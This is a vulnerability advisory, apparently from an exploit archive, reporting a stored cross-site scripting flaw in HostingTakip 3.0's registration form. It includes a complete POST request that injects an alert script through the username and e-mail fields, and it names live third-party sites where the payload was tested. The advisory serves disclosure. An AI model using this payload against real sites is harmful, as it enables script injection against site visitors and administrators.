HostingTakip 3.0 Cross Site Scripting

2015.03.17
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

HostingTakip v3.0 - Stored XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com Love to _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com ) ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : HostingTakip |~Affected Version : v3.0 |~Software : http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hostingtakip-hosting-yonetim-scripti.html |~Official Demo : http://hostingtakip.teknoder.com/demo/ |~RISK : Medium |~Tested On : [L] Windows 7, Mozilla Firefox ####################INFO################################ XSS payload is possible to run in your registration form. click on "Yeni Mteri" Here the e-mail section appears unprotected been no filtering Any payload code to enter "uye-duzenle.php" on will be permanent and will work ######################################################## Tested on; http://www.ayashosting.com http://www.oneritasarim.com/hostingtakip/ ---------------------------------------------------------- Proof image: http://i.hizliresim.com/mGZzQ8.png ---------------------------------------------------------- Request ---------------------------------------------------------- POST http://www.oneritasarim.com/hostingtakip/kayit_tamamla.php Request Headers: Host[www.oneritasarim.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php] Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)] Connection[keep-alive] Post Data: kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E] posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E] sifre[123456] ad[123456] tc[012345678901] tel[12345678901] mustip[b] sehir[h4] ilce[h4] adres[h4x0resec.blogspot.com] hakkimda[h4] guv[1b4b47] B1[G%F6nder] Response Headers: Content-Encoding[gzip] Vary[Accept-Encoding] Date[Fri, 13 Mar 2015 12:18:10 GMT] Server[LiteSpeed] Connection[close] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Content-Type[text/html] Content-Length[143]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top